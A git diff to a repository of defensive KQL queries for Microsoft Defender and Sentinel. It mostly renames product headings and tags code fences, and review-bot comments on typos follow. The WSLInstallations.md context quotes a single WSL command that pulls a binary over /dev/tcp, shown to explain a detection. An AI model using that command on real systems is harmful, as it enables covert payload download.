diff --git a/Defender For Identity/AnomalousGroupPolicyDiscovery.md b/Defender For Identity/AnomalousGroupPolicyDiscovery.md index 4d7f31a..5077398 100644 --- a/Defender For Identity/AnomalousGroupPolicyDiscovery.md +++ b/Defender For Identity/AnomalousGroupPolicyDiscovery.md @@ -17,8 +17,7 @@ Potential false positive is a new Administrator that has not performed group pol An attacker queries Group Policy object to gain valuable information about the environment. ## Defender For Endpoint - -``` +```KQL let PreviousActivity = materialize ( IdentityQueryEvents | where Timestamp > ago(30d) @@ -31,7 +30,7 @@ IdentityQueryEvents | where not(DeviceName has_any(PreviousActivity)) ``` ## Sentinel -``` +```KQL let PreviousActivity = materialize ( IdentityQueryEvents | where TimeGenerated > ago(30d) diff --git a/Defender For Identity/AnomalousLDAPTraffic.md b/Defender For Identity/AnomalousLDAPTraffic.md index 155ef7a..7a95f53 100644 --- a/Defender For Identity/AnomalousLDAPTraffic.md +++ b/Defender For Identity/AnomalousLDAPTraffic.md @@ -28,7 +28,7 @@ An adversary has gained access to your network and performes LDAP queries to per - https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ ## Defender For Endpoint -``` +```KQL // Variables to define the anomalous behaviour let starttime = 30d; let endtime = 1d; @@ -62,7 +62,7 @@ TimeSeriesAlerts | where PerHourCount > TotalEventsThreshold ``` ## Sentinel -``` +```KQL // Variables to define the anomalous behaviour let starttime = 90d; let endtime = 1d; diff --git a/Defender For Identity/UserAddedToSensitiveGroup.md b/Defender For Identity/UserAddedToSensitiveGroup.md index 17cf007..b23175c 100644 --- a/Defender For Identity/UserAddedToSensitiveGroup.md +++ b/Defender For Identity/UserAddedToSensitiveGroup.md 
@@ -20,8 +20,7 @@ A attacker has added themself to a sensitive group and can perform priviliges ac - https://learn.microsoft.com/en-us/defender-for-identity/entity-tags#sensitive-entities ### Defender For Endpoint - -``` +```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents | where Timestamp > ago(30d) @@ -32,7 +31,7 @@ IdentityDirectoryEvents | where Group has_any (SensitiveGroups) ``` ### Sentinel -``` +```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents | where TimeGenerated > ago(30d) diff --git a/Vulnerability Management/Active-EOS-Software.md b/Vulnerability Management/Active-EOS-Software.md index 6a8ea5f..ea92acd 100644 --- a/Vulnerability Management/Active-EOS-Software.md +++ b/Vulnerability Management/Active-EOS-Software.md @@ -1,6 +1,6 @@ # End of Support software used ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where EndOfSupportStatus == "EOS Version" or EndOfSupportStatus == diff --git a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md index 7050975..570b34a 100644 --- a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md +++ b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md @@ -1,6 +1,6 @@ # Query the installed extensions with the most required permissions ---- -### Defender For Endpoint +### Defender XDR ``` let ExtentionsWithNotification = DeviceTvmBrowserExtensionsKB | where PermissionId contains "Notification" 
diff --git a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md index 919c577..ec1ba8d 100644 --- a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md +++ b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md @@ -1,6 +1,6 @@ # Query the installed extensions with the most required permissions ---- -### Defender For Endpoint +### Defender XDR ``` let PermissionInformation = DeviceTvmBrowserExtensionsKB | where IsPermissionRequired == "true" diff --git a/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md b/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md index 49dd1b9..ca85c87 100644 --- a/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md +++ b/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md @@ -1,6 +1,6 @@ # Top 100 devices with the most browser extensions installed ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | summarize diff --git a/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md b/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md index 82645e1..ef191f4 100644 --- a/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md +++ b/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md @@ -1,6 +1,6 @@ # Top 100 critical browser extensions with the most permissions required ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | where ExtensionRisk == "Critical" 
diff --git a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md index 6307d16..8c7d25f 100644 --- a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md +++ b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md @@ -11,7 +11,7 @@ The vulnerabilities is known to be exploited by threat actors, thus depending on #### References - https://www.cisa.gov/known-exploited-vulnerabilities-catalog -### Defender For Endpoint +### Defender XDR ``` Devices with the most know exploited vulnerabilities let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, diff --git a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md index 24fa42c..d04a829 100644 --- a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md +++ b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md @@ -1,6 +1,6 @@ # Total vulnerable devices for known exploited vulnerabilities from CISA ---- -### Defender For Endpoint +### Defender XDR ``` let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, diff --git a/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md b/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md index 14a486a..42b649c 100644 --- a/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md +++ b/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md 
@@ -1,6 +1,6 @@ # Vulnerabilities that have an exploit available in MetaSploit by device ---- -### Defender For Endpoint +### Defender XDR ``` let MetaSploitExploitsWithAssignedCVE = externaldata(cveid: string)[@"https://feeds.ecrimelabs.net/data/metasploit-cve"] with (format="txt", ignoreFirstRecord=True); DeviceTvmSoftwareVulnerabilities diff --git a/Vulnerability Management/Curl-CVE-2023-38545.md b/Vulnerability Management/Curl-CVE-2023-38545.md index 27dea4a..1ef24d0 100644 --- a/Vulnerability Management/Curl-CVE-2023-38545.md +++ b/Vulnerability Management/Curl-CVE-2023-38545.md @@ -5,7 +5,7 @@ #### Description The maintainers of curl have informed us about two vulnerabilities in the software that will be fixed on the 11th of october. CVE-2023-38545 has a high serverity and affects both libcurl and the curl tool. This page can help you identify systems that run curl beforehand, in order for you to take imidiate action if needed. As advised by multiple security organisations your company should create an inventory of all systems that run curl. This can be done by running the following query in Defender For Endpoint. -### Defender For Endpoint +### Defender XDR ``` // List all devices that have curl installed or use curl. let ProcessBasedDevices = DeviceProcessEvents @@ -25,7 +25,7 @@ DeviceTvmSoftwareInventory //| distinct CombinedId, CombinedName ``` -### Defender For Endpoint +### Defender XDR ``` // List devices that have not been patched yet. // This query will only show results after MDE has indexed the vulnerable devices, thus no results are expected before the 11th of October. diff --git a/Vulnerability Management/CveLookup.md b/Vulnerability Management/CveLookup.md index 299b9ea..979fe10 100644 --- a/Vulnerability Management/CveLookup.md +++ b/Vulnerability Management/CveLookup.md 
@@ -1,6 +1,6 @@ # Lookup vulnerability information based on a CveID ---- -### Defender For Endpoint +### Defender XDR ``` let CVE = "CVE-2022-3602"; // Add your CVEid here DeviceTvmSoftwareVulnerabilities diff --git a/Vulnerability Management/Device-Configuration-Not-Compliant.md b/Vulnerability Management/Device-Configuration-Not-Compliant.md index 2693cdc..403187d 100644 --- a/Vulnerability Management/Device-Configuration-Not-Compliant.md +++ b/Vulnerability Management/Device-Configuration-Not-Compliant.md @@ -1,6 +1,6 @@ # Device congifuration not compliant ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSecureConfigurationAssessment | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId diff --git a/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md b/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md index b86e11b..6f61afe 100644 --- a/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md +++ b/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md @@ -1,6 +1,6 @@ # Device EDR settings are not compliant ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSecureConfigurationAssessment | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId diff --git a/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md b/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md index c8c1d03..019431c 100644 --- a/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md +++ b/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md @@ -1,6 +1,6 @@ # Devices with a recent vulnerability that is exploitable ---- -### Defender For Endpoint +### Defender XDR ``` let timeframe = 30d; //Customizable h = hours, d = days let ExploitableVulnerabilities = materialize 
diff --git a/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md b/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md index dfc7409..323909c 100644 --- a/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md +++ b/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md @@ -1,6 +1,6 @@ # Domain Controllers with the most vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` let AllDomainControllers = DeviceNetworkEvents diff --git a/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md b/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md index 7de5b2b..868ad75 100644 --- a/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md +++ b/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md @@ -14,7 +14,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ```KQL let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, notes: string)[@"https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"] with (format="csv", ignoreFirstRecord=True); DeviceTvmSoftwareVulnerabilities @@ -35,4 +35,4 @@ DeviceTvmSoftwareVulnerabilities | extend DueDateExceededByDays = datetime_diff('day', now(), dueDate), TotalVulnerableDevices = array_length(VulnerableDevices) | project-reorder CveId, vendorProject, DueDateExceededByDays, TotalVulnerableDevices | sort by DueDateExceededByDays, TotalVulnerableDevices -``` \ No newline at end of file +``` 
diff --git a/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md b/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md index c7976f0..6b0efa8 100644 --- a/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md +++ b/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md @@ -22,7 +22,7 @@ Exploitation of CVE-2024-3094. - https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094 - https://www.openwall.com/lists/oss-security/2024/03/29/4 -## Defender For Endpoint +## Defender XDR ```KQL let VulnerableXZDevices = DeviceTvmSoftwareInventory | where SoftwareName has "xz" @@ -47,4 +47,4 @@ DeviceNetworkEvents | where InitiatingProcessFileName contains "ssh" | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md b/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md index 9428577..fffd5c6 100644 --- a/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md +++ b/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md @@ -18,7 +18,7 @@ The risk of exploits on internet facing servers is higher, because they could be - https://attack.mitre.org/techniques/T1190/ - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/discovering-internet-facing-devices-using-microsoft-defender-for/ba-p/3778975 -### Defender For Endpoint +### Defender XDR ``` // Collect all internet facing devices let InternetFacingDevices = DeviceInfo 
diff --git a/Vulnerability Management/MostExploitedVulnerabilities2022.md b/Vulnerability Management/MostExploitedVulnerabilities2022.md index ac9a845..78376d4 100644 --- a/Vulnerability Management/MostExploitedVulnerabilities2022.md +++ b/Vulnerability Management/MostExploitedVulnerabilities2022.md @@ -35,7 +35,7 @@ Codeblock source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23 - https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/ - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a -### Defender For Endpoint +### Defender XDR ``` // Listing of the most exploited vulnerabilities of 2022. let 2022MostExploited = dynamic(['CVE-2021-34473', 'CVE-2021-31207', 'CVE-2021-34523', 'CVE-2018-13379', 'CVE-2021-40539', 'CVE-2021-26084', 'CVE-2021- 44228', 'CVE-2022-22954', 'CVE-2022-22960', 'CVE-2022-1388', 'CVE-2022-30190', 'CVE-2022-26134']); diff --git a/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md b/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md index 4d4d141..3c72eff 100644 --- a/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md +++ b/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md @@ -20,7 +20,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ```KQL // Define new let NewThreshold = 1d; @@ -46,4 +46,4 @@ DeviceTvmSoftwareVulnerabilities | where dateAdded > ago(NewThreshold)) on $left.CveId == $right.cveID | project-reorder DeviceName, CveId, vendorProject, vulnerabilityName, dateAdded, shortDescription -``` \ No newline at end of file +``` 
diff --git a/Vulnerability Management/OpenSSLVulnerableDevices.md b/Vulnerability Management/OpenSSLVulnerableDevices.md index c566a29..ca7e6f6 100644 --- a/Vulnerability Management/OpenSSLVulnerableDevices.md +++ b/Vulnerability Management/OpenSSLVulnerableDevices.md @@ -1,6 +1,6 @@ # List all the vulnerable devices for the OpenSSL critical vulnerability (nov 2022) ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where SoftwareName contains "openssl" diff --git a/Vulnerability Management/Pivot - DeviceVulnerabilities.md b/Vulnerability Management/Pivot - DeviceVulnerabilities.md index f5b62c3..b578776 100644 --- a/Vulnerability Management/Pivot - DeviceVulnerabilities.md +++ b/Vulnerability Management/Pivot - DeviceVulnerabilities.md @@ -5,7 +5,7 @@ #### Description This query returns a row for each device with the amount of Critical, High, Medium and Low Vulnerabilities that device has. -## Defender For Endpoint +## Defender XDR ``` DeviceTvmSoftwareVulnerabilities | project DeviceName, VulnerabilitySeverityLevel diff --git a/Vulnerability Management/PrioritizeSecureConfiguration.md b/Vulnerability Management/PrioritizeSecureConfiguration.md index 130b505..9efa8a3 100644 --- a/Vulnerability Management/PrioritizeSecureConfiguration.md +++ b/Vulnerability Management/PrioritizeSecureConfiguration.md @@ -15,4 +15,4 @@ DeviceTvmSecureConfigurationAssessment | join kind=inner DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId | sort by ConfigurationImpact, TotalDevices | project-reorder ConfigurationId, ConfigurationImpact, TotalDevices, ConfigurationName, ConfigurationCategory, ConfigurationSubcategory -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md b/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md index 0729c14..fc2d023 100644 
--- a/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md +++ b/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md @@ -96,4 +96,4 @@ KnowExploitesVulnsCISA } ] } -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md b/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md index a8508c3..53eb046 100644 --- a/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md +++ b/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md @@ -1,6 +1,6 @@ # Top 10 devices with the most exploitable vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` let ExploitableVulnerabilities = materialize (DeviceTvmSoftwareVulnerabilitiesKB diff --git a/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md b/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md index 2a48509..5ee5fbe 100644 --- a/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md +++ b/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md @@ -1,6 +1,6 @@ # Top 10 devices with the most Critical and High vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareVulnerabilities | where VulnerabilitySeverityLevel has_any ('critical', 'High') diff --git a/Vulnerability Management/Upcomming-EOS-Software.md b/Vulnerability Management/Upcomming-EOS-Software.md index dccd6c2..0af4f49 100644 --- a/Vulnerability Management/Upcomming-EOS-Software.md +++ b/Vulnerability Management/Upcomming-EOS-Software.md @@ -1,6 +1,6 @@ # Upcomming End of Support software used ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where EndOfSupportStatus == "Upcoming EOS Version" 
diff --git a/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md b/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md index 0ec80b4..c1fe08d 100644 --- a/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md +++ b/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md @@ -1,6 +1,6 @@ # Most common installed cricital extensions visualised ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | where ExtensionRisk == "Critical" diff --git a/Vulnerability Management/Visualization - ExposureLevels.md b/Vulnerability Management/Visualization - ExposureLevels.md index 8ef59e4..fde9ec5 100644 --- a/Vulnerability Management/Visualization - ExposureLevels.md +++ b/Vulnerability Management/Visualization - ExposureLevels.md @@ -8,7 +8,7 @@ This query visualizes the onboarded devices and their exposure level in a PieCha #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL DeviceInfo | where Timestamp > ago(30d) @@ -25,4 +25,4 @@ DeviceInfo | summarize arg_max(TimeGenerated, *) by DeviceId | summarize Total = count() by ExposureLevel | render piechart with(title="Overview Exposure Level") -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md b/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md index e91ef0d..ccebeea 100644 --- a/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md +++ b/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md @@ -1,6 +1,6 @@ # Vulnerabilities visualized in a Piechart ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareVulnerabilities | summarize count() by VulnerabilitySeverityLevel 
diff --git a/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md b/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md index e482bc4..57c11fb 100644 --- a/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md +++ b/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md @@ -11,7 +11,7 @@ The vulnerabilities is known to be have a POC available, which increases the cha #### References - https://github.com/tg12/PoC_CVEs -### Defender For Endpoint +### Defender XDR ``` // Extract the CVE IDs that have an available POC let VulnerabilitiesWithPOC = externaldata(CVE: string, URL: string )[@"https://raw.githubusercontent.com/tg12/PoC_CVEs/main/cve_links.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Vulnerability Management/WSLInstallations.md b/Vulnerability Management/WSLInstallations.md index d0b4d30..141ea00 100644 --- a/Vulnerability Management/WSLInstallations.md +++ b/Vulnerability Management/WSLInstallations.md @@ -19,7 +19,7 @@ wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules -## Defender For Endpoint +## Defender XDR ``` let WSLDevices = DeviceProcessEvents | where Timestamp > ago(30d) @@ -28,4 +28,4 @@ let WSLDevices = DeviceProcessEvents DeviceInfo | where DeviceId in (WSLDevices) | summarize arg_max(Timestamp, *) by DeviceId -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/WeakSSHVersionUsed.md b/Vulnerability Management/WeakSSHVersionUsed.md index ac9f480..47ee351 100644 --- a/Vulnerability Management/WeakSSHVersionUsed.md +++ b/Vulnerability Management/WeakSSHVersionUsed.md @@ -1,6 +1,6 @@ # Detect the usage of weak SSH sessions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents
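Review bot: In the `Defender For Identity/AnomalousGroupPolicyDiscovery.md` hunks the fences gain a `KQL` tag but the headings stay `## Defender For Endpoint`, while every `Vulnerability Management/*.md` file in this patch renames that heading to `Defender XDR`. If the rename is the intended new convention, apply it here and in the `AnomalousLDAPTraffic.md` and `UserAddedToSensitiveGroup.md` hunks as well, so the repository does not end up with both names for the same product.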
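Review bot: In the `Vulnerability Management/Active-EOS-Software.md` hunk the heading is renamed but the fence directly below it stays a bare "```", whereas the Defender For Identity hunks in this same patch change their fences to "```KQL". Since the file is already being touched, tag this fence (and the bare fences in the other renamed Vulnerability Management files) the same way so syntax highlighting is consistent across the repository.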
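Review bot: The `BrowserExtension - InstalledExtensionsWithNotificationPermissions.md` hunk shows the context title `# Query the installed extensions with the most required permissions`, which is identical to the title in `InstalledExtensionsWithTheMostRequiredPermissions.md`, yet the query below filters on `PermissionId contains "Notification"`. Rename the title to describe notification permissions so the two files can be told apart in the rendered index.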
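Review bot: In the `CISAKnowExploitsVulnerabilitiesDeviceTotal.md` hunk the context shows the plain text `Devices with the most know exploited vulnerabilities` as the first line inside the fenced block, ahead of `let KnowExploitesVulnsCISA = externaldata(...)`; copied as-is into the query editor this line is not valid KQL and the query fails to parse. Move it above the fence as a description (and spell it "known") or prefix it with `//` so it becomes a comment.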
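Review bot: In the `Curl-CVE-2023-38545.md` hunks both headings become `### Defender XDR`, leaving two identical headings for two different queries (the inventory of devices running curl and the list of devices not yet patched) in one file, and the description context still says "running the following query in Defender For Endpoint". Give the two sections distinct headings and update the prose to match the new product name; the same context line also has "serverity", "imidiate" and "october" worth fixing while here.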
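Review bot: In the `MostExploitedVulnerabilities2022.md` hunk the context line `let 2022MostExploited = dynamic([... 'CVE-2021- 44228' ...])` contains a space inside the Log4Shell identifier; if that space is really in the file, that CVE never matches `DeviceTvmSoftwareVulnerabilities` and the query silently under-reports. Please verify the stored value is `'CVE-2021-44228'`, and confirm that a `let` name beginning with a digit parses in your tenant; Kusto identifiers normally start with a letter or underscore, so `MostExploited2022` is the safer name.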
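Review bot: The `Device-Configuration-Not-Compliant.md` hunk keeps the context title `# Device congifuration not compliant`; since this line is already within the hunk, correct it to "configuration" in the same commit.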
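Review bot: The `Upcomming-EOS-Software.md` hunk keeps the context title `# Upcomming End of Support software used` while the query filters on `EndOfSupportStatus == "Upcoming EOS Version"`; fix the spelling in the heading to "Upcoming" (the file name carries the same typo, which would need a separate rename).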
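Review bot: The `Visualization - BrowserExtension - MostCommonCricitalExtensions.md` hunk keeps the context title `# Most common installed cricital extensions visualised`; correct "cricital" to "critical" in the heading, matching the `ExtensionRisk == "Critical"` filter below it.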